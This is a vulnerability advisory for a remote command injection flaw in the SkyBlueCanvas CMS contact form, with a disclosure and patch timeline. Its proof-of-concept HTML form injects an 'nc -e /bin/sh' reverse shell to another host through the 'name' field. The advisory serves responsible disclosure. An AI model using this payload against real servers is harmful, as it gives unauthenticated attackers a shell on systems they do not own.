Vulnerability in SkyBlueCanvas CMS
Remote Command Injection
1.1 r248-03 (and probably prior versions)
Scott Parish - Center for Internet Security
SkyBlueCanvas is an easy-to-use Web Content Management System, that makes it simple to keep the content of your site
fresh. You simply upload the software to your web server, and you are ready to start adding text and pictures to your
The SkyBlueCanvas Lightweight CMS application contains a remote command injection vulnerability within the form on the
Contact page. A remote un-authenticated user can exploit this vulnerability to force the webserver to execute commands
in the context of the vulnerable application. It is possible to exploit this vulnerability because the POST parameters
"name", "email", "subject", and "message" are not properly sanitized when submitted to the index.php?pid=4 page.
Arbitrary commands can be executed by injecting the following payload to a vulnerable parameter:
Since the page does not display the results of the injected command (blind injection) then testing must be done using a
ping, nc, or similar command.
Proof of Concept Exploit Code:
<form action="http://localhost/index.php?pid=4"; method="post">
<input type="hidden" name="cid" value="3">
<input type="hidden" name="name" value="test"; nc -e /bin/sh 192.168.1.2 12345">
<input type="hidden" name="email" value="test">
<input type="hidden" name="subject" value="test">
<input type="hidden" name="message" value="test">
<input type="hidden" name="action" value="Send">
<input type="submit" value="submit">
The vendor has issued a fix to the vulnerability in version 1.1 r248-04
1/9/14 - Vulnerability discovered
1/10/14 - Vulnerability disclosed privately to vendor
1/22/14 - Patch released by vendor
1/23/14 - Vulnerability disclosed publicly
This message and attachments may contain confidential information. If it appears that this message was sent to you by
mistake, any retention, dissemination, distribution or copying of this message and attachments is strictly prohibited.
Please notify the sender immediately and permanently delete the message and any attachments.